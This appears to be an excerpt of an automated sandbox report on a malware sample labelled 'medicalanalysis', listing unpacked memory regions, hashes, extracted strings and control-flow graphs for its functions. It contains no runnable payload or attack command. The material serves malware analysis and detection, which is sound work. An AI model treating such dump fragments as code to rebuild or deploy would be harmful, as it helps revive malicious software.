                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228055733.00000000056D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: true
                                                                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2227832328.0000000005680000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5680000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 0130f6caada80c854d8bc127cbf87bb4d8396ebdde55a3a389f1778343557088
                                                                                                                                                                                                                                                                                                              • Instruction ID: b8822dcb512e9ddcda5bba61314b6ccf80268b93771accce5b8a611300326dfd
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0130f6caada80c854d8bc127cbf87bb4d8396ebdde55a3a389f1778343557088
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 943188B5D012189FCB10CFA9D984A9EFBF5FB49310F20942AE815B7210C775A946CFA4
                                                                                                                                                                                                                                                                                                              Function 057C7B89 Relevance: 1.5, Strings: 1, Instructions: 284COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228715270.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_57c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: Te^q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-671973202
                                                                                                                                                                                                                                                                                                              • Opcode ID: b640b4be5858a396f926606696f2fdc840f53fe308d92a0bd27bbcd9a4ee404d
                                                                                                                                                                                                                                                                                                              • Instruction ID: 53c3400514a82a1497b855e82163b9935631ae7a6eabbbcc33f8263a31338069
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b640b4be5858a396f926606696f2fdc840f53fe308d92a0bd27bbcd9a4ee404d
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9BC1D374E05218CFDB68CFA9D884BADBBF2FB49304F2480ADD409AB265DB749945DF00
                                                                                                                                                                                                                                                                                                              Function 05C3F070 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2230065854.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5c20000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: Deq
                                                                                                                                                                                                                                                                                                              • API String ID: 0-948982800
                                                                                                                                                                                                                                                                                                              • Opcode ID: 0008e64065e0342cf3fc3bcb9e3b75ec5dc47daa887d6e4c68968f67c6e2ebed
                                                                                                                                                                                                                                                                                                              • Instruction ID: daa42a54ca91f167be1d4b3b16a5cb12ed2220518fb8f047e90acab913f8b20c
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0008e64065e0342cf3fc3bcb9e3b75ec5dc47daa887d6e4c68968f67c6e2ebed
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BFD1C274E00218CFDB64DFA9D984A9DBBB2FF89304F1084A9D409AB365DB35AD81CF51
                                                                                                                                                                                                                                                                                                              Function 057C7B98 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228715270.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_57c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: Te^q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-671973202
                                                                                                                                                                                                                                                                                                              • Opcode ID: 9259e91176e88cbefe1db6c28756e1468f0c6aa7cd2618ed2d677466cc2b9cb0
                                                                                                                                                                                                                                                                                                              • Instruction ID: 50d6949e90d68ecd31a1100c3469648542f6ef24e11ff25411b545b4a7c5e48e
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9259e91176e88cbefe1db6c28756e1468f0c6aa7cd2618ed2d677466cc2b9cb0
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08B1E474E05218CFDB28CF69D484BADBBF6FB89304F1490ADD409AB265DB749985DF00
                                                                                                                                                                                                                                                                                                              Function 021B17C0 Relevance: .2, Instructions: 218COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2218058169.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_21b0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 69987d94880b73a7cb26234ab09f30f5850ff8cf22527cfdc6a2999b6e352b3c
                                                                                                                                                                                                                                                                                                              • Instruction ID: c6b011a33a6f9073e2b09d2160a57eaf180efc689f66a33ba107f0084e2f6575
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 69987d94880b73a7cb26234ab09f30f5850ff8cf22527cfdc6a2999b6e352b3c
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A91A134A84108EFDB15DF69D4A4BE977F3BF89310F1684B5E40A9B3A4C7749985CB40
                                                                                                                                                                                                                                                                                                              Function 021B1A1F Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2218058169.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_21b0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                                                                              • Opcode ID: 815da4825f9a2cf40665b5cf5b659b01174a4c96f82189acfd13cb4974d0c136
                                                                                                                                                                                                                                                                                                              • Instruction ID: fc56006f8d6488f3052e6562a90a4d3b78c74eed47cceb618a8fedff33dbcc79
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 815da4825f9a2cf40665b5cf5b659b01174a4c96f82189acfd13cb4974d0c136
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A516F34A84108EFEB15DF68D4A4BE977F3BF89354F168475E00A9B3A4C7749985CB40
                                                                                                                                                                                                                                                                                                              Function 0579BF30 Relevance: 7.7, Strings: 6, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 650 579bf30-579bf7c 655 579c0fa-579c132 650->655 656 579bf82-579bf94 650->656 668 579c139-579c13c 655->668 669 579c134-579c136 655->669 659 579bfe4-579c02d 656->659 660 579bf96-579bfe2 656->660 687 579c030-579c070 659->687 660->687 672 579c13d-579c166 668->672 669->672 674 579c16c-579c175 672->674 675 579c3b5-579c3bc 672->675 677 579c1eb-579c204 674->677 678 579c177-579c17b 674->678 690 579c20a 677->690 691 579c331-579c341 677->691 681 579c17d-579c192 678->681 682 579c194-579c1a0 678->682 683 579c1a9-579c1e6 681->683 682->683 683->675 701 579c07a-579c084 687->701 702 579c072-579c078 687->702 690->691 695 579c35a-579c366 691->695 696 579c343-579c358 691->696 697 579c36f-579c3b0 695->697 696->697 697->675 703 579c087-579c0a0 701->703 702->703 706 579c0a7-579c0ca 703->706 710 579c0cc-579c0e8 706->710 711 579c0f0-579c0f7 706->711 710->711
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
                                                                                                                                                                                                                                                                                                              • API String ID: 0-723292480
                                                                                                                                                                                                                                                                                                              • Opcode ID: 1bd502ebe6a961426fdf650b2b9c7f65644cfb1abaca42c378ff4cb93b913b11
                                                                                                                                                                                                                                                                                                              • Instruction ID: 7df368b79472f4751f4c93dc387ba6e95fc455304930190c3dd7e9ebddf095f3
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1bd502ebe6a961426fdf650b2b9c7f65644cfb1abaca42c378ff4cb93b913b11
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC51A670A402098FCB19DB7D995466FBBE7BFC8300F14882DD4099B369DF359D468BA1
                                                                                                                                                                                                                                                                                                              Function 0579AC70 Relevance: 4.2, Strings: 3, Instructions: 484COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 1206 579ac70-579ac98 1208 579ac9a-579ace1 1206->1208 1209 579ace6-579acf4 1206->1209 1258 579b13d-579b144 1208->1258 1210 579ad03 1209->1210 1211 579acf6-579ad01 call 5798790 1209->1211 1214 579ad05-579ad0c 1210->1214 1211->1214 1216 579ad12-579ad16 1214->1216 1217 579adf5-579adf9 1214->1217 1218 579ad1c-579ad20 1216->1218 1219 579b145-579b16d 1216->1219 1221 579adfb-579ae0a call 57969b8 1217->1221 1222 579ae4f-579ae59 1217->1222 1223 579ad32-579ad90 call 57984d0 call 5798f38 1218->1223 1224 579ad22-579ad2c 1218->1224 1228 579b174-579b19e 1219->1228 1236 579ae0e-579ae13 1221->1236 1225 579ae5b-579ae6a call 5796168 1222->1225 1226 579ae92-579aeb8 1222->1226 1268 579b203-579b218 1223->1268 1269 579ad96-579adf0 1223->1269 1224->1223 1224->1228 1241 579ae70-579ae8d 1225->1241 1242 579b1a6-579b1bc 1225->1242 1247 579aeba-579aec3 1226->1247 1248 579aec5 1226->1248 1270 579b1a5 1228->1270 1243 579ae0c 1236->1243 1244 579ae15-579ae4a call 579a738 1236->1244 1241->1258 1267 579b1c4-579b1e6 1242->1267 1243->1236 1244->1258 1256 579aec7-579aeef 1247->1256 1248->1256 1273 579afc0-579afc4 1256->1273 1274 579aef5-579af0e 1256->1274 1278 579b1ed-579b1fc 1267->1278 1277 579b21a 1268->1277 1268->1278 1269->1258 1270->1242 1279 579b03e-579b048 1273->1279 1280 579afc6-579afdf 1273->1280 1274->1273 1307 579af14-579af23 call 5795b90 1274->1307 1281 579b21c 1277->1281 1282 579b221-579b224 1277->1282 1278->1268 1284 579b04a-579b054 1279->1284 1285 579b0a5-579b0ae 1279->1285 1280->1279 1309 579afe1-579aff0 call 5795b90 1280->1309 1281->1270 1288 579b21e 1281->1288 1289 579b225-579b22d 1282->1289 1305 579b05a-579b06c 1284->1305 1306 579b056-579b058 1284->1306 1291 579b0b0-579b0de call 5797ce0 call 5797d00 1285->1291 1292 579b0e6-579b133 1285->1292 1288->1289 1294 579b220 1288->1294 1295 579b22f-579b235 1289->1295 1296 579b237-579b23d 1289->1296 1291->1292 1317 579b13b 1292->1317 1294->1282 1295->1296 1302 579b23e-579b27b 1295->1302 1310 579b06e-579b070 1305->1310 1306->1310 1320 579af3b-579af50 1307->1320 1321 579af25-579af2b 1307->1321 1335 579b008-579b013 1309->1335 1336 579aff2-579aff8 1309->1336 1314 579b09e-579b0a3 1310->1314 1315 579b072-579b076 1310->1315 1314->1284 1314->1285 1324 579b078-579b091 1315->1324 1325 579b094-579b099 call 5794990 1315->1325 1317->1258 1331 579af52-579af7e call 5796e30 1320->1331 1332 579af84-579af8d 1320->1332 1327 579af2d 1321->1327 1328 579af2f-579af31 1321->1328 1324->1325 1325->1314 1327->1320 1328->1320 1331->1267 1331->1332 1332->1268 1340 579af93-579afba 1332->1340 1335->1268 1337 579b019-579b03c 1335->1337 1341 579affa 1336->1341 1342 579affc-579affe 1336->1342 1337->1279 1337->1309 1340->1273 1340->1307 1341->1335 1342->1335
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: Hbq$Hbq$Hbq
                                                                                                                                                                                                                                                                                                              • API String ID: 0-2297679979
                                                                                                                                                                                                                                                                                                              • Opcode ID: fb20007cb005e6c838c3cb73f8d29a44854f5cd10e903b224e1df780ddbdbe77
                                                                                                                                                                                                                                                                                                              • Instruction ID: 91b96759ce9d44e47ced8a6238737ec3345923ef1eb0c711362ff1c473804f13
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fb20007cb005e6c838c3cb73f8d29a44854f5cd10e903b224e1df780ddbdbe77
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20126270A042058FCB29DFA9D499A6EBBF6FF88300F14852DE40A9B355DB31EC45DB61
                                                                                                                                                                                                                                                                                                              Function 0579C928 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 1456 579c928-579c965 call 579ce31 1458 579c987-579c99d call 579c730 1456->1458 1459 579c967-579c96a 1456->1459 1465 579cd13-579cd27 1458->1465 1466 579c9a3-579c9af 1458->1466 1572 579c96c call 579d298 1459->1572 1573 579c96c call 579d294 1459->1573 1461 579c972-579c974 1461->1458 1463 579c976-579c97e 1461->1463 1463->1458 1477 579cd67-579cd70 1465->1477 1467 579cae0-579cae7 1466->1467 1468 579c9b5-579c9b8 1466->1468 1469 579caed-579caf6 1467->1469 1470 579cc16-579cc50 call 579c138 1467->1470 1471 579c9bb-579c9c4 1468->1471 1469->1470 1473 579cafc-579cc08 call 579c138 call 579c6c8 call 579c138 1469->1473 1574 579cc53 call 579f0d0 1470->1574 1575 579cc53 call 579f0c3 1470->1575 1475 579ce08 1471->1475 1476 579c9ca-579c9de 1471->1476 1567 579cc0a 1473->1567 1568 579cc13 1473->1568 1479 579ce0d-579ce11 1475->1479 1493 579cad0-579cada 1476->1493 1494 579c9e4-579ca79 call 579c730 * 2 call 579c138 call 579c6c8 call 579c770 call 579c818 call 579c880 1476->1494 1480 579cd72-579cd79 1477->1480 1481 579cd35-579cd3e 1477->1481 1485 579ce1c 1479->1485 1486 579ce13 1479->1486 1482 579cd7b-579cdbe call 579c138 1480->1482 1483 579cdc7-579cdce 1480->1483 1481->1475 1488 579cd44-579cd56 1481->1488 1482->1483 1491 579cdd0-579cde0 1483->1491 1492 579cdf3-579ce06 1483->1492 1498 579ce1d 1485->1498 1486->1485 1501 579cd58-579cd5d 1488->1501 1502 579cd66 1488->1502 1491->1492 1505 579cde2-579cdea 1491->1505 1492->1479 1493->1467 1493->1471 1547 579ca98-579cacb call 579c880 1494->1547 1548 579ca7b-579ca93 call 579c818 call 579c138 call 579c3e8 1494->1548 1498->1498 1570 579cd60 call 579f870 1501->1570 1571 579cd60 call 579f860 1501->1571 1502->1477 1505->1492 1514 579cc59-579cd0a call 579c138 1514->1465 1547->1493 1548->1547 1567->1568 1568->1470 1570->1502 1571->1502 1572->1461 1573->1461 1574->1514 1575->1514
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-1196845430
                                                                                                                                                                                                                                                                                                              • Opcode ID: 416b446a7858c63a753b3edf825f6b436ef4760ffa9ebf407d0aea85514ee17c
                                                                                                                                                                                                                                                                                                              • Instruction ID: 6f9a2b0bbad39eb18ef34f38b8645d7f632b84b96e82951fc59f05a839d92f8c
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 416b446a7858c63a753b3edf825f6b436ef4760ffa9ebf407d0aea85514ee17c
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9F1D934B10218DFDB09DF64E999A9DBBB6FF89300F518159E406AB365DB30EC42DB50
                                                                                                                                                                                                                                                                                                              Function 05751EA8 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228162929.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5750000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 4'^q$4'^q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-2697143702
                                                                                                                                                                                                                                                                                                              • Opcode ID: 2fd1834d447b2c9c8fd6ada352a968bf327de70b02ea42c981a7bff5d9ff405b
                                                                                                                                                                                                                                                                                                              • Instruction ID: 83be5bd50423df40a779403a8801f889ce4a6b289d9d6ffd737596714296bc73
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fd1834d447b2c9c8fd6ada352a968bf327de70b02ea42c981a7bff5d9ff405b
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4942F878E04209CFCB14DF99D488ABEBBB2FB49321F508029E91267355CB749D86EF51
                                                                                                                                                                                                                                                                                                              Function 05752EB8 Relevance: 3.0, Strings: 2, Instructions: 488COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 2122 5752eb8-5752ee3 2124 5752ee5 2122->2124 2125 5752eea-5752f09 2122->2125 2124->2125 2126 5752f0b-5752f14 2125->2126 2127 5752f2a 2125->2127 2128 5752f16-5752f19 2126->2128 2129 5752f1b-5752f1e 2126->2129 2130 5752f2d-5752f31 2127->2130 2131 5752f28 2128->2131 2129->2131 2132 57534ec-5753503 2130->2132 2131->2130 2134 5752f36-5752f3a 2132->2134 2135 5753509-575350d 2132->2135 2136 5752f3c-5752f97 2134->2136 2137 5752f3f-5752f43 2134->2137 2138 5753542-5753546 2135->2138 2139 575350f-575353f 2135->2139 2149 5752f9c-5752fa0 2136->2149 2150 5752f99-5752ff5 2136->2150 2143 5752f45-5752f69 2137->2143 2144 5752f6c-5752f8e 2137->2144 2140 5753567 2138->2140 2141 5753548-5753551 2138->2141 2139->2138 2148 575356a-5753570 2140->2148 2146 5753553-5753556 2141->2146 2147 5753558-575355b 2141->2147 2143->2144 2144->2132 2152 5753565 2146->2152 2147->2152 2155 5752fa2-5752fc6 2149->2155 2156 5752fc9-5752fec 2149->2156 2158 5752ff7-5753058 2150->2158 2159 5752ffa-5752ffe 2150->2159 2152->2148 2155->2156 2156->2132 2168 575305d-5753061 2158->2168 2169 575305a-57530b6 2158->2169 2165 5753027-575303e 2159->2165 2166 5753000-5753024 2159->2166 2178 5753040-5753046 2165->2178 2179 575304e-575304f 2165->2179 2166->2165 2175 5753063-5753087 2168->2175 2176 575308a-57530ad 2168->2176 2180 57530b8-5753114 2169->2180 2181 57530bb-57530bf 2169->2181 2175->2176 2176->2132 2178->2179 2179->2132 2189 5753116-5753172 2180->2189 2190 5753119-575311d 2180->2190 2186 57530c1-57530e5 2181->2186 2187 57530e8-575310b 2181->2187 2186->2187 2187->2132 2199 5753174-57531d0 2189->2199 2200 5753177-575317b 2189->2200 2196 5753146-5753169 2190->2196 2197 575311f-5753143 2190->2197 2196->2132 2197->2196 2209 57531d5-57531d9 2199->2209 2210 57531d2-5753233 2199->2210 2206 57531a4-57531c7 2200->2206 2207 575317d-57531a1 2200->2207 2206->2132 2207->2206 2215 5753202-5753219 2209->2215 2216 57531db-57531ff 2209->2216 2219 5753235-575329d 2210->2219 2220 5753238-575323c 2210->2220 2229 5753229-575322a 2215->2229 2230 575321b-5753221 2215->2230 2216->2215 2231 57532a2-57532a6 2219->2231 2232 575329f-5753307 2219->2232 2225 5753271-5753294 2220->2225 2226 575323e-575326e 2220->2226 2225->2132 2226->2225 2229->2132 2230->2229 2236 57532a8-57532d8 2231->2236 2237 57532db-57532fe 2231->2237 2240 575330c-5753310 2232->2240 2241 5753309-5753371 2232->2241 2236->2237 2237->2132 2245 5753345-5753368 2240->2245 2246 5753312-5753342 2240->2246 2250 5753376-575337a 2241->2250 2251 5753373-57533db 2241->2251 2245->2132 2246->2245 2255 575337c-57533ac 2250->2255 2256 57533af-57533d2 2250->2256 2260 57533e0-57533e4 2251->2260 2261 57533dd-5753445 2251->2261 2255->2256 2256->2132 2264 57533e6-5753416 2260->2264 2265 5753419-575343c 2260->2265 2270 5753447-57534ac 2261->2270 2271 575344a-575344e 2261->2271 2264->2265 2265->2132 2280 57534e1-57534e4 2270->2280 2281 57534ae-57534de 2270->2281 2274 5753450-5753480 2271->2274 2275 5753483-57534a6 2271->2275 2274->2275 2275->2132 2280->2132 2281->2280
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228162929.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5750000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 4'^q$4'^q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-2697143702
                                                                                                                                                                                                                                                                                                              • Opcode ID: 354cda8166c5a4388ebb4e0232ce26589ed1055e1a7a520471f068fc38d98d55
                                                                                                                                                                                                                                                                                                              • Instruction ID: ec3009ca61faa97629a994bf13013e8ad24c3747c7f800af4aa652ae5c3a0380
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 354cda8166c5a4388ebb4e0232ce26589ed1055e1a7a520471f068fc38d98d55
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7922F370E15218CFCB25DFE5C4486ACBBB2FF89311F60846AE80AAB254CB755E85DF41
                                                                                                                                                                                                                                                                                                              Function 057971D9 Relevance: 3.0, Strings: 2, Instructions: 484COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 2294 57971d9-5797214 2296 579721d-5797230 call 5796e68 2294->2296 2297 5797216 2294->2297 2300 5797374-579737b 2296->2300 2301 5797236-5797249 2296->2301 2297->2296 2302 5797381-5797396 2300->2302 2303 5797615-579761c 2300->2303 2307 579724b-5797252 2301->2307 2308 5797257-5797271 2301->2308 2314 5797398-579739a 2302->2314 2315 57973b6-57973bc 2302->2315 2305 579768b-5797692 2303->2305 2306 579761e-5797627 2303->2306 2310 5797698-57976a1 2305->2310 2311 579772e-5797735 2305->2311 2306->2305 2312 5797629-579763c 2306->2312 2313 579736d 2307->2313 2326 5797278-5797285 2308->2326 2327 5797273-5797276 2308->2327 2310->2311 2316 57976a7-57976ba 2310->2316 2317 5797751-5797757 2311->2317 2318 5797737-5797748 2311->2318 2312->2305 2334 579763e-5797683 call 57943c0 2312->2334 2313->2300 2314->2315 2321 579739c-57973b3 2314->2321 2322 57973c2-57973c4 2315->2322 2323 5797484-5797488 2315->2323 2338 57976cd-57976d1 2316->2338 2339 57976bc-57976cb 2316->2339 2319 5797769-5797772 2317->2319 2320 5797759-579775f 2317->2320 2318->2317 2340 579774a 2318->2340 2328 5797761-5797767 2320->2328 2329 5797775-57977b9 2320->2329 2321->2315 2322->2323 2333 57973ca-579744b call 57943c0 * 4 2322->2333 2323->2303 2330 579748e-5797490 2323->2330 2335 5797287-579729b 2326->2335 2327->2335 2328->2319 2328->2329 2382 57977c1-57977ea 2329->2382 2330->2303 2336 5797496-579749f 2330->2336 2401 579744d-579745f call 57943c0 2333->2401 2402 5797462-5797481 call 57943c0 2333->2402 2334->2305 2371 5797685-5797688 2334->2371 2335->2313 2369 57972a1-57972f5 2335->2369 2346 57975f2-57975f8 2336->2346 2341 57976f1-57976f3 2338->2341 2342 57976d3-57976d5 2338->2342 2339->2338 2340->2317 2341->2311 2349 57976f5-57976fb 2341->2349 2342->2341 2348 57976d7-57976ee 2342->2348 2351 579760b 2346->2351 2352 57975fa-5797609 2346->2352 2348->2341 2349->2311 2357 57976fd-579772b 2349->2357 2354 579760d-579760f 2351->2354 2352->2354 2354->2303 2363 57974a4-57974b2 call 5795b90 2354->2363 2357->2311 2375 57974ca-57974e4 2363->2375 2376 57974b4-57974ba 2363->2376 2409 5797303-5797307 2369->2409 2410 57972f7-57972f9 2369->2410 2371->2305 2375->2346 2386 57974ea-57974ee 2375->2386 2380 57974bc 2376->2380 2381 57974be-57974c0 2376->2381 2380->2375 2381->2375 2412 57977f8 2382->2412 2413 57977ec-57977f6 2382->2413 2389 579750f 2386->2389 2390 57974f0-57974f9 2386->2390 2394 5797512-579752c 2389->2394 2392 57974fb-57974fe 2390->2392 2393 5797500-5797503 2390->2393 2396 579750d 2392->2396 2393->2396 2394->2346 2415 5797532-57975b3 call 57943c0 * 4 2394->2415 2396->2394 2401->2402 2402->2323 2409->2313 2414 5797309-5797319 2409->2414 2410->2409 2416 57977fd-57977ff 2412->2416 2413->2416 2448 579731c call 5794450 2414->2448 2449 579731c call 5794440 2414->2449 2442 57975ca-57975f0 call 57943c0 2415->2442 2443 57975b5-57975c7 call 57943c0 2415->2443 2417 5797801-5797804 2416->2417 2418 5797806-579780b 2416->2418 2419 5797811-579783e 2417->2419 2418->2419 2420 579731f-5797321 2420->2313 2422 5797323-579732f 2420->2422 2424 579733e-5797344 2422->2424 2425 5797331-5797334 2422->2425 2427 579734c-5797355 2424->2427 2428 5797346-5797349 2424->2428 2425->2424 2430 5797364-579736a 2427->2430 2431 5797357-579735a 2427->2431 2428->2427 2430->2313 2431->2430 2442->2303 2442->2346 2443->2442 2448->2420 2449->2420
